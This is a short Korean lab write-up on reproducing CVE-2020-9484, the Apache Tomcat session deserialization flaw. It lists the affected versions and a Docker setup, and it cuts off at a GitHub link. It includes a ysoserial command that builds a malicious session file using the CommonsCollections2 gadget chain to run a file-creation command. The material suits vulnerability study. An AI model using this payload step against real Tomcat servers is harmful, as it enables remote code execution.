세션 역직렬화

(Session Deserialization) Apache Tomcat 취약점 - CVE-2020-9484

CVE-2020-9484 0. 취약한 환경 버전 Apache Tomcat 7.0.0 ~ 7.0.103 8.5.0 ~ 8.5.54 9.0.0.M1 ~ 9.0.34 10.0.0-M1 ~ 10.0.0-M4 1. 환경 구성 1. ubuntu 20.04 2. docker 3. ysoserial CommonsCollections2 가젯 체인을 이용하여 공격 코드가 포함된 세션 파일 생성 ( docker 파일 내 첨부되어 따로 실행하지 않아도 됨) java -jar ./ysoserial-master.jar CommonsCollections2 'tocuh /tmp/rce' > groovy.session ysoserial: https://github.com/frohoff/ysoserial GitHub - frohoff/..